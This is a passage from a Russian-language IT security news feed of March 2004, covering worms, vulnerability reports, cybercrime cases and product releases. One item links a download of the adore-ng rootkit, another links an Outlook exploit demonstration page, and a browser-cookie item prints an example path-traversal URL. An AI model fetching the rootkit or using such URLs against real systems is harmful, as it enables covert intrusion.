Продолжается подготовка к Дальневосточному интернет-форуму который пройдёт в Хабаровске 3 и 4 апреля. Как сообщил корреспонденту информационного агентства «Дейта RU» один из организаторов Интернет-форума Андрей ПАДЕНКОВ, в рамках форума пройдёт занимательный тренинг, в его рамках будет предоставлена сеть, и два хакера будут пытаться взломать её, а в это время системному администратору этой сети будет поставлена задача не допустить проникновения в сеть. На форум уже подали заявки около 70 человек, число участников с каждым днём растет.
Подробности -

16/03/2004 14:08 Убийственное sms от Nokia.
Финское семейство разослало своим клиентам sms-приглашения на выставку CeBIT в Ганновере. В итоге пользователи некоторых моделей Nokia остались без мобильников. Дело в том, что определенные текстовые сообщения с картинкой выводят из строя сотовые аппараты Nokia, представленные в сериях 3510i, 5100 и 6100. Для того чтобы уладить недоразумение всех пострадавших попросили обратиться в центр обслуживания, где, как обещается, мобильные устройства будут немедленно возвращены к жизни (обычно в сервисах Nokia просят отставить телефон на сутки). Единственная проблема, с которой придется столкнуться пользователям вышеозначенных моделей, это вход на выставочную территорию компании (Club Nokia Lounge). Ведь злосчастное sms является пригласительным билетом.
Источник - http://www.mobile9.com/

16/03/2004 13:46 Cisco повышает безопасность сетей.
Специалисты Cisco Systems объявили в рамках развития стратегии Cisco Self-Defending Network о выпуске и модернизации своих устройств, поддерживающих виртуальные частные сети (VPN), а также о расширении функциональности межсетевой операционной системы IOS и ПО Security Device Manager. Теперь маршрутизаторы 7301 Router способны формировать VPN с пропускной способностью 370 Mбит/с в дополнение к возможности управления межсетевыми экранами, маршрутизацией и качеством обслуживания. Семейство VPN-концентраторов 3000 пополнилось моделью VPN 3020 Concentrator. В этом устройстве объединены функции удаленного доступа на основе IPSec (Internet Protocol Security) и SSL (Secure Sockets Layer). В режиме IPSec и SSL поддерживаются соответственно до 750 и 200 одновременно работающих VPN-пользователей. Ряд новых функций обеспечения безопасности введен в состав IOS Software Release 12.3T.
Источник - http://www.osp.ru

16/03/2004 13:23 В апреле выйдет кластерная версия MySQL.
В апреле компания MySQL начнёт продажи MySQL Cluster, версию с высокой готовностью своей СУБД с открытым исходным кодом, предназначенную для установки на кластерных системах. Кластерный пакет объединяют базу данных MySQL и движок хранения данных, разработанный компанией Ericsson для телекоммуникационных приложений, который был приобретён MySQL в ноябре прошлого года. Совмещённый продукт даёт возможность кластеризировать базы данных MySQL, используя различное аппаратное обеспечение и программные платформы, включая Linux, Windows и Solaris, а также процессорные платформы Intel и SPARC. Продукт будет доступен под коммерческой лицензией. MySQL также представил более гибкую программу лицензирования, подобную той, что используется в Apache и Artistic для клиентских библиотек MySQL, которые используются приложениями для получения доступа в базу данных MySQL.
Источник - http://www.cnews.ru

16/03/2004 12:51 Обнаружены две модификации червя Bagle.
Специалисты сразу нескольких антивирусных компаний сообщили об обнаружении новых модификаций вредоносной программы Bagle. Червь Bagle, напомним, досаждает пользователям Всемирной сети уже два месяца, распространяясь по электронной почте в виде вложенных в письмо файлов. При этом тема, текст послания и имя вложения меняются произвольным образом. После проникновения на компьютер червь регистрируется в системном реестре, обеспечивая, тем самым, свой автоматический запуск при загрузке Windows, и начинает рассылку копий по найденным на машине адресам электронной почты с применением встроенного SMTP-сервера. Кроме того, в начале марта создатели Bagle выпустили в интернет несколько новых модификаций вируса, применяющих весьма оригинальную схему формирования зараженного сообщения. В частности, вредоносный код помещался в zip-файл, защищенный паролем (сам пароль указывался в тексте письма). Такая тактика вводила в заблуждение как многих пользователей, так и некоторые антивирусные пакеты, не способные вскрыть зашифрованный архив. А в минувшие выходные было зафиксировано появление версий червя Bagle.n и Bagle.o, использующих еще более хитрые способы проникновения в систему. В частности, наряду с форматом zip, вредоносная программа теперь способна работать и с rar-архивами. Более того, пароль к зашифрованному файлу передается не в виде текста, а в виде графического изображения, что, естественно, усложняет идентификацию вируса. Наконец, Bagle.n и Bagle.o научились внедрять свой код в тело исполняемых файлов, найденных на инфицированной машине. Впрочем, ведущие антивирусные фирмы уже включили защиту от Bagle.n и Bagle.o в свои базы данных.
Источник - http://www.compulenta.ru

16/03/2004 12:14 Отчет: поток новых дыр ослабевает, но черви продолжают точить интернет.
За последние шесть месяцев количество предупреждений о пробелах в защите ПО пошло на спад, однако интернет все еще кишит червями. Согласно отчету Internet Security Threat Report, опубликованному в понедельник компанией Symantec (он выходит два раза в год), в 2003 году была обнародована информация о 2636 уязвимостях, обнаруженных компаниями и экспертами по безопасности. Это всего на 2% больше, чем в 2002 году, отмечает старший директор Symantec Альфред Хьюгер. С 2001 по 2002 год прирост составил 81%. «Поток объявлений об уязвимостях впервые за годы нашего наблюдения пошел на спад», — сказал Хьюгер. Отчет подтверждает тенденцию, обнаруженную Координационным центром по реагированию на события, связанные с компьютерной безопасностью (Computer Emergency Response Team Coordination Center): в прошлом году в эту организацию поступило 3784 сообщения об уязвимостях, что на 8% меньше, чем в 2002 году. Данная тенденция может указывать как на общее повышение качества разрабатываемого ПО, так и на то, что программисты учатся избегать наиболее распространенных ошибок. Другой вероятный фактор — эксперты по безопасности могут задерживать публикацию предупреждений, предоставляя компаниям возможность исправлять ошибки.
Подробности - http://zdnet.com.com/2100-1105_2-5173216.html

16/03/2004 11:33 Японская полиция передала в прокуратуру дела двух хакеров.
Японская полиция направила в прокуратуру материалы расследования по делу двух граждан, подозреваемых во взломе корпоративного сервера интернет-провайдера из города Осака. По информации сайта Yomiuri, взлом сервера был совершен с использованием метода, впервые представленного 40-летним сотрудником университета Киото Казухо Каваи. 31-летнего жителя префектуры Чиба и 22-летнего жителя префектуры Саитама обвиняют в нарушении закона о несанкционированном доступе к компьютерной информации. Инкриминируемое хакерам деяние, по данным следствия, было совершено 9 ноября прошлого года с использованием сайта Ассоциации по защите авторских прав в области программного обеспечения.
Источник - http://www.viruslist.ru

15/03/2004 17:30 Атаки хакеров на сайт ЦИК РФ не увенчались успехом.
Атаки, предпринятые хакерами на интернетовский сайт Центризбиркома РФ в день президентских выборов, не увенчались успехами. Об этом в информационном центре "Выборы-2004" заявил председатель ЦИК Александр Вешняков. "Такие атаки есть, но мы чувствуем себя еще более уверено, чем на прошедших парламентских выборах",- сказал Вешняков, отвечая на вопрос РИА "Новости". Во время выборов депутатов Госдумы 7 декабря прошлого года было предпринято более 900 хакерских атак на сайт ЦИК РФ. Как ранее заявил Вешняков, после этого специалистами Центризбиркома были усилены меры безопасности интернет-сайта.
Источник - http://www.rian.ru

15/03/2004 17:21 В США внедряют средства слежения за интернет-трафиком.
Министерство юстиции США выступает за ужесточение средств контроля за интернет-трафиком и другими современными средствами связи. Это планируется сделать путем расширения сферы действия закона от 1994 года, согласно которому операторы обязаны встраивать в оборудование средства прослушивания. При наличии санкции суда этими средствами могут воспользоваться правоохранительные органы или спецслужбы. Однако при использовании относительно новых средств связи, например, интернета или IP-телефонии, таких мощных средств контроля нет. Естественно, американским властям, борющимся с мировым терроризмом, это вовсе не по душе. Поэтому недавно Министерство юстиции США и Управление США по борьбе с наркотиками обратились в Федеральную комиссию США по связи с предложением, наконец, ввести новые требования, предоставляющие властям возможность слежки в сетях связи на базе новых технологий. При этом Минюст США полагает, что установка средств мониторинга интернет-трафика должна осуществляться компаниями за свой счет, хотя и с возможностью переноса дополнительных издержек на абонентов. То есть обеспечить возможность слежки в интернете предполагается, в том числе, и за счет повышения абонентской платы за услуги. Само собой, это не может не вызывать критики в отношении проекта: его противники считают, что предлагаемые системы слежки будут чрезмерно дороги и малоэффективны.
Источник - http://www.compulenta.ru

15/03/2004 17:08 Выход Crypto-Gram.
По сложившейся традиции 15 числа (сегодня стало быть) вышел очередной номер эжемесячного электронного журнала Crypto-Gram, посвящённого вопросам безопасности и криптографии. Выпускается уже седьмой год Брюсом Шнайером, руководителем и основателем фирмы Counterpane Internet Security, Inc. Подписчиками журнала являются около 100 тыс. чел. Из нововведений - возможность прочитать журнал в формате RSS.
Подробности - http://www.schneier.com/crypto-gram-0403.html

15/03/2004 16:44 QNX 6 NTFS Driver v0.50
Alexander Domo выпустил новую версию своего NTFS-драйвера для операционной системы QNX 6, сообщает www.nixp.ru. Драйвер позволяет считывать данные с Windows-раздела жесткого диска, если используется файловая система NT. Новая версия работает как демон, и нет необходимости в ее прописывании в автозагрузку. Исправлены некоторые ошибки, добавлены новые возможности, но поддержка записи до сих пор крайне ограничена.
Скачать - http://domo.qnx.org.ru/downloads/fs-nt-0.50-x86-sources.tgz

15/03/2004 15:46 Махинации на рабочем месте
В райцентре Веселое (Запорожская область) задержан сотрудник местного отделения банка, который с помощью нехитрых махинаций присвоил 20 тысяч долларов США и свыше 16 тысяч гривен. 27-летний мужчина занимал должность операциониста индивидуального бизнеса. С мая по декабрь прошлого года незаконно оформил на подставных лиц 75 пластиковых карточек и установил на них финансовые лимиты в национальной и иностранной валюте на общую сумму 130 тыс. грн. А затем сам получил эти пластиковые карточки и, пользуясь доступом к внутренним сетям банка, снял все предусмотренные в качестве финансового лимита деньги. Незаконное обогащение служащего выявили местные прокурорские работники, проводившие плановую проверку деятельности банка. Молодой человек арестован на основании статьи 191 ч.5 уголовного кодекса Украины (присвоение имущества в особо крупных размерах путем злоупотребления служебным положением), - сообщают в районном отделе прокуратуры. Практически все средства, добытые преступным путем, будут возвращены банку.
Источник - http://www.crime-research.ru

14/03/2004 19:20 В Сеть просочились исходники Nintendo DS.
Спецификации карманной игровой консоли Nintendo DS оказались частично опубликованными в интернете, сообщает GamesIndustry. Из этих спецификаций, в частности, GamesIndustry выяснили, что готовящаяся к выпуску консоль будет поддерживать работу в беспроводных локальных сетях и получит 4 Mb оперативной памяти. Видеоподсистема обеспечит возможность работы с 3D-графикой. Скорость прорисовки в этом случае составит порядка 120 тысяч полигонов в секунду (скорость заполнения — 30 млн пикселей в секунду). Объем видеопамяти, предположительно, будет равен 656 кб. В консоли планируется установить чип ARM-9 с тактовой частотой 67 МГц и чип ARM-7 с тактовой частотой 33 МГц. Жидкокристаллические дисплеи будут иметь разрешение 256 х 192 точки и смогут отображать 262144 оттенка цвета.
Подробности - http://www.webplanet.ru

14/03/2004 19:15 СБУ снова наследила в Интернете.
В украинском Интернете вызрел очередной скандал с политической окраской. Обиженная на закрытие сайта редакция сначала публично обвинила провайдера и СБУ, а потом принесла свои извинения. По информации АИН, конфликт вышел на точку кипения 10 марта. Около 16.00 была закрыта интернет-газета «Салун». За несколько часов до закрытия редакция распространила в СМИ заявление. В нем говорилось о том, что фактическое закрытие осуществлял не провайдер - IP Telecom - а сотрудники СБУ. "На вопрос о том, чем именно привлекло внимание столь уважаемого ведомства скромное издание Салун, сотрудники СБУ сообщили, что сайт зарегистрирован якобы по поддельным документам, но в то же время отметили, что на самом деле речь идет о серии критических публикаций на страницах издания о руководстве Службы безопасности Украины", - говорится в заявлении. В IP Telecom не замедлили с ответом на данный выпад. "В компании "АйПи Телеком" был зарегистрирован домен saloon.kiev.ua. В компанию было передано официальное заявление человека, на паспорт которого регистрировался домен и был заключен договор хостинга. Серия и номер паспорта были те же, а вот Ф.И.О. совершенно другие. Не трудно понять, что домен регистрировался по поддельным документам", - утверждается в официальном заявлении руководства компании.
Подробности - http://www.internet.ru/index.php?itemid=9051

14/03/2004 18:59 Военные преподали Microsoft урок нравственности.
Софтверный гигант оказался в центре этического скандала. «Подкупить» военных и госслужащих не удалось. Солдатам приказано вернуть бесплатное ПО производителю. Шум вокруг противозаконной деятельности корпорации поднялся после того, как сотрудники военных и правительственных ведомств получили бесплатные копии пакета программ Office 2003. Власти потребовали от редмондского гиганта прекратить аморальные маневры, которые расцениваются как взяточничество. По сообщению Cnet , бесплатное распространение программного обеспечения, цена которого составляет 500 долларов, было уловкой против производителей ПО с открытым кодом. Однако сигналы о «подарках» были получены соответствующими отделами в военном и внутреннем министерствах. Было вынесено постановление, что предложение Microsoft незаконно. Все копии программ Office 2003 должны быть возвращены. Стоит отметить, что даже представители вооруженных сил лично написали Биллу Гейтсу письмо, где потребовали остановить противоправные действия, апеллируя к тому, что он вынуждает служащих бессознательно нарушать этические правила и положения, которым они присягали. Тем не менее, в Microsoft заявили, что цель их программы заключается в том, чтобы как можно большее количество людей «опробовали новые функции» и «узнали, как позитивно использовать их для собственных организаций». Как сообщает The Inquirer , софтверный гигант продолжит безвозмездную рассылку. Однако прекратит отправлять программное обеспечение тем агентствам, которые высказали свое несогласие.
Источник - http://www.runet.ru

14/03/2004 18:19 В Бомбее открылась первая экспертная лаборатория по компьютерным преступлениям.
С целью повышения уровня информационной безопасности в Индии главное управление полиции г.Бомбей совместно с Национальной Ассоциацией Софтверных и Сервисных Компаний (National Association of Software and Services Companies (Nasscom), учредили первую и единственную пока в Индии экспертную лабораторию по компьютерным преступлениям. По словам учредителей, создание лаборатории вызвано ростом компьютерной преступности в стране и, в связи с этим, необходимостью технического и профессионального усовершенствования полиции. Киберлаборатория будет оснащена SuSe Linux Server (в поддержку свободного программного обеспечения), 10 компьютерами и двумя ноутбуками с OC Windows. Для повышения эффективности работы лаборатории, помогать «киберполицейским» будут специалисты из Индийского Института Высоких Технологий, которые будут отслеживать тенденции компьютерной преступности не только в Индии, но и во всем мире. В настоящий момент специалистами лаборатории разрабатывается стратегия контроля за киберпреступностью. Лаборатория будет обеспечивать сбор информации и прием заявлений от граждан о компьютерных преступлениях и других инцидентах в сети, а также проводить экспертизу оборудования по компьютерным преступлениям. Силами служащих лаборатории будет проводиться работа по оповещению пользователей об угрозах компьютерной преступности в сети.
Источник - http://www.crime-research.ru

14/03/2004 18:05 Германия строит национальную grid-сеть.
Представители германского правительства объявили на открывшейся в Берлине конференции Global Grid Forum о начале инициативы D-Grid, в рамках которой в стране планируется построить национальную коммуникационную инфраструктуру для научных исследований, основанную на технологиях grid. D-Grid - одна из составляющих программы e-Science, задачей которой является обеспечение возможности совместного проведения в стране исследовательских работ географически распределенными группами ученых. В рамках D-Grid планируется создать вычислительную grid-инфраструктуру, разработать соответствующее ПО промежуточного слоя, построить сети обмена информацией для e-Science и начать ряд пилотных проектов. В работу над D-Grid вовлечены научные учреждения различных городов Германии, а также компании IBM, HP и Cray. К grid-сети планируется подключить организации, ведущие исследования в областях астрофизики и физики частиц, высокопроизводительных вычислений, информатики и инженерных наук, медицины и биоинформационных технологий, метеорологии и геонаук, а также издательства научной литературы.
Источник - http://www.osp.ru

14/03/2004 17:50 Intel пронумерует чипы.
Компания планирует ввести новую систему обозначения процессоров Pentium и Celeron, которая должна лучше отражать производительность разных моделей. Ожидается, что Intel начнет практиковать эту систему с выпуском нового процессора Pentium М с кодовым названием Dothan, который должен появиться во втором квартале. А летом Intel снабдит номерами моделей и процессоры Pentium 4 и Celeron, утверждают источники. Процессорам будут присваиваться номера, указывающие на их производительность и дополняющие значение тактовой частоты. Планируемая система, ориентированная на общую производительность чипов, означает крутой поворот маркетинговой машины Intel. Компания потратила годы и израсходовала миллионы долларов на продвижение тактовой частоты в качестве главной меры быстродействия своих процессоров и основной черты, отличающей их от конкурирующих продуктов Advanced Micro Devices. Но времена меняются. С конца 90-х семейство процессоров Intel стало более сложным и разнообразным. По плану нумерации моделей значение тактовой частоты станет одним из нескольких показателей — включая размер кэша и быстродействие шины, — которые в сумме будут характеризовать производительность. Такая система должна помочь потребителям сравнивать чипы по принципу «хороший-лучший-наилучший», говорит источник.
Подробности - http://zdnet.com.com/2100-1103_2-5172938.html

14/03/2004 17:26 Нигерия создала структуру для борьбы с киберпреступлениями.
Президент Нигерии Олусегун Обасанджо объявил о создании в стране специального подразделения по борьбе с преступлениями в сфере высоких технологий. В задачу нового ведомства будет входить не только выявление киберпреступлений, но и ведение активной разъяснительной работе с населением, сообщает сайт газеты Guardian. Кроме того, сотрудники нового ведомства будут информировать о результатах своей деятельности мировое сообщество и привлекать его внимание к усилиям, прилагаемым в Нигерии для противостояния высокотехнологичным угрозам. Созданная в Нигерии структура будет также координировать работу правоохранительных органов, разведки и служб безопасности во избежание юридических нестыковок в их борьбе против компьютерных преступников. Решение о создании нигерийского ведомства для противостояния компьютерным угрозам было принято по результатам заседания правительства, состоявшегося в конце ноября прошлого года.
Подробности - http://www.guardiannewsngr.com/business/article04

14/03/2004 16:37 SGI создала 256-процессорный кластер под управлением Linux.
Компания Silicon Graphics (SGI), объявила о создании на базе платформы Altix 3000 кластера из 256 процессоров Intel Itanium под управлением одной реализации ОС Linux. SGI сообщает о планах увеличить число процессоров в платформе до 512 к концу года. Решение Advanced Linux Environment для кластерных систем Altix уже доступно для коммерческого использования. Партнером SGI по расширению вычислительной мощности платформы Altix c использованием Linux стал исследовательский центр НАСА в Калифорнии, занимающийся изучением климата.
Источник - http://www.cnews.ru

14/03/2004 16:18 Вещи, которые есть в Mozill'е, и которых не хватает в IE.
Господин под ником Maniac осчастливил рунет-сообщество неплохой статьёй, описывающей особенности и фичи, которые присутствуют у Mozilla (и различных клонов - например, Firefox). Таковых набралось аж 21 штука. Если вы не являетесь пользователем Mozilla или FireFox и раздумываете, а не сменить ли свой основной инструмент работы в сети, то может быть нижеследующий материал поможет определиться с выбором. Да и уже состоявшимся пользователям упомянутых броузеров будет не лишним взглянуть - вдруг, что новое откроется...
Статья - http://jim.pp.ru/helps/internet/mozilla.htm

14/03/2004 15:12 Способ програмно увеличить обьём HDD.
Настоящий взрыв потряс вчера англоязычный Интернет, сообщает sysadmins.ru. Вы не поверите: найден способ в домашних условиях, буквально в пятнадцать минут увеличить ёмкость большинства жёстких дисков в полтора-два раза! И исключительно с помощью программных манипуляций! Собственно начало сумасшествию, в считанные часы охватившему самые популярные технофорумы, положила небольшая публикация в известном сетевом британском издании The Inquirer, один из читателей которого прислал редакции рецепт активации скрытых и неиспользуемых зон, якобы имеющихся на каждом современном винчестере. Повторить этот опыт может каждый, в чьём распоряжении имеются два жёстких диска. Единственное, о чём не следует забывать - это полное отсутствие гарантий безопасности хранящихся на винчестерах данных, так как в процессе эксперимента они могут быть утеряны.
Подробности - http://www.computerra.ru/think/sentinel/32517/

13/03/2004 18:41 Россия: статистика компьютерных преступлений.
Первые преступления с использованием компьютерной техники появились в России в 1991 г., когда были похищены 125,5 тыс. долларов США во Внешэкономбанке СССР. Весь мир облетело уголовное дело по обвинению Левина и др., совершивших хищение денег с банковских счетов на большом расстоянии с использованием ЭВМ. С тех пор статистика по преступлениям в сфере компьютерной информации выглядит следующим образом. По данным ГИЦ МВД России, в 1997 г. было зарегистрировано 7 преступлений в сфере компьютерной информации, в том числе возбуждено уголовных дел по ст.272 УК РФ – 6, по ст.273 – 1. В 1998г. зарегистрировано 66 преступлений в сфере компьютерной информации, в том числе по ст.272 УК РФ – 53, по ст.273 – 12, по ст.274 – 1. В 1999г. зарегистрировано 294 преступления, из них по ст.272 – 209, по ст.273 – 85. В 2000г. зарегистрировано 800 преступлений в сфере компьютерной информации, из них по ст.272 – 584, по ст.273 – 172, по ст.274 – 44. В 2003 году в России было возбуждено 1602 уголовных дела по ст.272 («Неправомерный доступ к компьютерной информации») и 165 ("Причинение имущественного ущерба путем обмана и злоупотребления доверием") УК РФ. Это составляет 76% от общего числа возбужденных уголовных дел по преступлениям в сфере компьютерной информации. Как следует из представленных данных, количество регистрируемых преступлений в сфере компьютерной информации представляет собой стабильно неуклонно растущую кривую, динамика роста которой составляет порядка 400% ежегодно
Источник - http://www.crime-research.ru

13/03/2004 18:16 ФБР разрешат "прослушивать" все интернет-коммуникации.
Министерство юстиции США предлагает существенно расширить возможности правительства страны по слежению за интернет-трафиком. Минюст, в частности, считает необходимым предоставление провайдерами сети облегченного доступа для систем перехвата ФБР и других государственных систем электронного слежения. Правоохранительные органы в последнее время серьезно обеспокоены тем, что развитие интернет-телефонии может помочь террористам и преступникам избежать слежки. В свете этого ведущие эксперты в области технологий и юристы уже предупредили, что контроль государства может распространиться в США на очень многие типы онлайн-коммуникаций, в том числе на системы IM (Instant Messaging). Кроме того, контролю могут быть подвергнуты визиты частных лиц на веб-сайты. При этом защитники гражданских прав утверждают, что в этом случае гарантий невмешательства правительства в частную жизнь невинных пользователей будет явно недостаточно.
Источник - http://www.securitylab.ru

13/03/2004 17:46 Cisco покупает фирму Twingo.
Компания Cisco Systems объявила о приобретении небольшой калифорнийской фирмы Twingo Systems. Twingo специализировалась на разработке систем безопасного доступа к сетевым ресурсам с помощью виртуальных частных сетей и протокола SSL. До настоящего времени Twingo оставалась частной компанией. На ее приобретение Cisco потратит около 5 млн. долларов деньгами. По завершении покупки Twingo станет частью подразделения Cisco VPN & Security и будет подчиняться руководителю подразделения Ричарду Палмеру. Все технологии и разработки Twingo ,elen при этом поставляться под маркой Cisco. При этом Cisco планирует внедрить разработанную Tingo технологию Virtual Secure Desktop в собственные решения серии WebVPN. Первыми здесь станут концентраторы серии Cisco VPN 3000. В этих устройствах будет реализована система удаления частной информации по завершении сессии SSL VPN, причем надежность работы системы не будет зависеть от клиентской платформы.
Источник - http://www.compulenta.ru

13/03/2004 17:04 Открытым кодом - по пиратству.
Министерство науки и техники Вьетнама планирует в течение четырех ближайших лет вложить 20 млн. долл. в осуществление инициативы по содействию разработке и внедрению в стране программного обеспечения с открытым кодом. Согласно заявлению правительства Вьетнама, за счет данной программы в стране рассчитывают сократить затраты на покупку ПО, развить локальную программную индустрию и снизить уровень пиратства. Одна из задач инициативы - разработать локализованное прикладное ПО с открытым кодом для применения частными предприятиями и государственными организациями. Правительство рассчитывает "заменить все применяемое в стране программное обеспечение на приложения с открытым кодом, и в частности, отказаться от Windows и перейти на Linux". ПО с открытым кодом планируется внедрить в том числе в силовых ведомствах и в оборонной сфере. По данным Business Software Association, в 2001 году более 90% программного обеспечения, применявшегося во Вьетнаме, являлось пиратским.
Источник - http://www.osp.ru

13/03/2004 16:42 Инвестиционная фирма подтвердила наличие связи между Microsoft и SCO.
Инвестиционная компания BayStar Capital подтвердила информацию о существовании связи между двумя противниками Linux, сообщив в четверг, что, благодаря рекомендации Microsoft, BayStar собрала для SCO Group 50 млн долл. «Да, Microsoft порекомендовала SCO BayStar», — сказал в четверг представитель BayStar, отказавшись сообщить подробности и повторив свою прежнюю позицию, что в этой сделке деньги самой Microsoft фактически не фигурировали. Информация о сватовстве Microsoft всплыла на прошлой неделе, когда сторонник движения open-source Эрик Раймонд опубликовал попавшее ему в руки письмо, из которого следует, что Microsoft способствовала инвестициям BayStar. SCO Group подтвердила подлинность письма, но сказала, что его автор, сотрудник S2 Strategic Consulting Майк Андерер, неправильно истолковал ситуацию. Фанаты open-source расценили это письмо как свидетельство того, что Microsoft помогает SCO атаковать Linux. SCO утверждает, что операционная система Linux нарушает ее права интеллектуальной собственности на Unix, и требует от организаций лицензионную плату за использование Linux. Компания наняла известного адвоката Дэвида Бойза и судится с AutoZone, DaimlerChrysler, Novell и IBM, а также собиралась судиться с Bank of America. Аналитик Illuminata Гордон Хафф считает, что причастность Microsoft к сделке не характеризует софтверного гиганта с положительной стороны. «Это еще не дымящийся пистолет, свидетельствующий о спланированных действиях руководства Microsoft, которое дергает за ниточки марионетку SCO. В то же время очень нехорошо, что Microsoft как-то замешана в финансировании SCO. Учитывая, что, с одной стороны, Microsoft является осужденным монополистом, а с другой — финансовые связи и действия SCO выглядят все более сомнительными, Microsoft определенно следовало бы держаться от грязного белья SCO как можно дальше».
Подробности - http://news.com.com/2100-7344_3-5172426.html?tag=nefd_lede

13/03/2004 15:58 Почтовая служба Hotmail прекратила работать.
В пятницу почтовый сервер Hotmail, поддерживаемый корпорацией Microsoft, испытывал значительные технические сложности и не функционировал большую часть рабочего дня по тихоокеанскому времени, передает агентство Reuters. Представители Microsoft извинились за неудобства, связанные с недоступностью сервисов Hotmail, MSN Messenger и некоторых других. В настоящее время причина неполадок установлена, ведутся работы по ее устранению. Как ожидается, в полном объеме услуги серверов будут предоставляться к вечеру пятницы (утром в субботу по московскому времени). Риска потери данных пользователей не возникало, подчеркнули представители Microsoft.
Подробности - http://www.reuters.co.uk/newsArticle.jhtml?type=internetNews&storyID=4559827%15ion=news

12/03/2004 14:51 Новый релиз руткита adore-ng.
Господин stealth из segfault.net анонсировал доступность версии самого, пожалуй, известного руткита для *nix-ОС под названием adore-ng, портированного для нового ядра Linux - 2.6. Все основные особенности с ядра 2.4, естественно, были перенесены в новую версию.
Скачать - http://stealth.7350.org/rootkits/adore-ng-0.41.tgz

12/03/2004 12:46 Мегафон-Москва вводит услугу определения координат на местности.
Впервые в России сеть «МегаФон-Москва» представляет передовую мобильную услугу Автоматический Определитель местоПоложения (АОП). Новая услуга позволяет владельцам мобильных телефонов определять с высокой точностью координаты других абонентов своей сети, при их безусловном согласии. Российская услуга АОП базируется на разработках шведской фирмы Mobilaris и корпорации Эрикссон. АОП очень прост в использовании. Владельцу телефона достаточно отправить на номер 000980 SMS-сообщение с номером искомого абонента (который также пользуется услугой АОП), и система практически сразу пришлет по SMS ответ на запрос. Например: «7926ххххххх nahoditsya ryadom s Savvinskaya nab / M. Savvinskiy per. 12.00 15.04.2004». С помощью новой услуги москвичи теперь смогут в нужный момент узнавать, где находятся их дети-школьники и другие члены семьи, а молодым людям станет проще назначать встречи друзьям. В центре города координаты определяются с точностью до 100 метров. АОП – услуга добровольная, поэтому если человек запретил определять свои координаты, их не смогут получить даже самые близкие люди. При желании пользователь также может настроить режим, при котором он всегда будет знать, кто и когда запрашивает его координаты. В целом же существует четыре различных режима АОП (от полного запрета до полной «прозрачности»), и абонент всегда может выбрать удобный для себя вариант.
Источник - http://www.mobile-review.com

12/03/2004 12:11 Бета-версию антивирусного монитора для Linux и FreeBSD.
"Лаборатория Касперского" сообщает о начале открытого бета-тестирования важного компонента нового поколения системы антивирусной защиты файловых серверов Linux и FreeBSD — антивирусного монитора. Он предназначен для предварительной антивирусной проверки файлов, осуществляемой путем перехвата текущих файловых операций, связанных с вирусной активностью. Новый антивирусный монитор для файловых серверов Linux и FreeBSD обладает широким спектром функциональных возможностей, устраняющих угрозу заражения вредоносными программами. Монитор не оставляет им шанса на успех: перехват файловых операций чтения/записи, исходящих от любых процессов операционной системы, не позволит заразить расположенные на сервере объекты. Помимо этого, антивирусный монитор для файловых серверов Linux и FreeBSD позволяет удаленно настраивать установленную на сервере систему антивирусной защиты "Лаборатории Касперского". Это производится при помощи веб-интерфейса популярной утилиты управления Webmin, а также через конфигурационный файл Антивируса Касперского®.
Подробности - http://www.kaspersky.ru/news.html?id=146296578

12/03/2004 11:39 Новая система противодействия DoS-атакам.
Молодая американская компания Symbiot Security планирует предложить новый способ борьбы с DoS-атаками, сообщает "Компьюлента". Первый продукт компании под названием iSIMS будет выпущен в свет 31 марта. Его главной отличительной особенностью станет возможность не только сдерживать атаки извне, но и наносить ответные удары по компьютерам, с которых происходит нападение. Как говорится в пресс-релизе компании, iSIMS сможет идентифицировать источник атаки и оказывать ему активное противодействие. По словам главы Symbiot Security Майкла Эрвина, главным недостаток всех предшествующих систем электронной защиты заключался в том, что все они были пассивными. По мнению Эрвина, создание вокруг информационной системы оборонительных рубежей уже недостаточно для ее надежной защиты. Противодействие хакерам, по мнению руководителя Symbiot, должно быть активным. В настоящее время на сайте компании ведется обратный отсчет времени до выпуска iSIMS. Вместе с тем, ряд экспертов уже выразили сомнение в законности применения к хакерам их же приемов. В большинстве действующих в мире законов о киберперступности, не существует понятия о самозащите, поэтому ответный удар по атакующей машине не может квалифицироваться иначе, как обычная хакерская атака со всеми вытекающими последствиями. Ситуация усугубляется тем, что часто для организации DoS-атак хакеры используют чужие компьюетры, зараженные предварительно вирусами или троянами.
Подробности - http://home.businesswire.com/portal/site/google/index.jsp?...

12/03/2004 11:04 Выход ядра Linux 2.6.4.
Вышла очередная версия ядра Linux ветви 2.6. Изменений довольно много - читайте Changelog. Будем надеяться, что стабильность значительно увеличена.
Подробности - http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.4

11/03/2004 18:45 Демонстрация уязвимости Outlook.
Shaun Colley из Великобритании выложил URL, сходив на который можно увидеть - уязвим ли ваш Outlook. Сходив по ссылке, приведённой ниже можно проверить уязвимость. Если при посещении страницы запустится Outlook и появится alert box с надписью "vulnerable" - вывод очевиден.
Ссылка - http://www.nettwerked.co.uk/code/outlooksploit.html

11/03/2004 15:07 Уязвимость во многих браузерах.
Уязвимость обнаружена в нескольких браузерах от различных производителей в обработке cookies. Удаленный пользователь может обойти ограничения пути, установленные владельцем куки. Удаленный пользователь (сервер) может использовать комбинацию обхода пути и технологию кодирования, чтобы обойти ограничения пути в куки в целевом браузере пользователя. Пример: http://host/secure/%2e%2e/sample/insecure.cgi?xss=<golarge>. Уязвимость присутствует в браузерах: Microsoft Internet Explorer 5.5-6.0, Apple Safari, KDE Konqueror, Mozilla, Opera до версии 7.21. Устранена на настоящий момент в Opera 7.21, в Mozilla для LINUX, Konqueror. Многие производители дистрибутивов Linux Провели обновления в своих библиотеках kdelibs для устранения описанной уязвимости.
Подробности - http://www.securitylab.ru/43593.html

11/03/2004 14:11 Уязвимость в gdk-pixbuf.
Бюллетень по безопасности, выпущенный компанией Red Hat RHSA-2004:102-01 сообщает о наличии уязвимости в пакете gdk-pixbuf. Библиотека загрузки графических файлов, которая содержится в этом пакете, используется GUI Gnome. В дистрибутиве Red Hat 9 эта библиотека также используется различными приложениями, в частности графическим почтовым клиентом Evolution для загрузки графических файлов. Thomas Kristensen обнаружил, что сформировав определённый BMP-файл позволяет "свалить" Evolution. Как следует из описания, для получения DoS необходимо послать по почте специальным образом сформированный графический файл. Уязвимость присутствует в версии gdk-pixbuf до 0.20. Выпущена версии 0.22, в которой уязвимость устранена. В соответствии с ранее объявленной программой поддержки в данный момент обновления выпускаются только для версии Red Hat 9 (да и то - до конца апреля). Для более старых версий выпускаеются только ОЧЕНЬ критические обновления.
Источник - https://www.redhat.com/solutions/security/

11/03/2004 13:47 Переполнение буфера в Python.
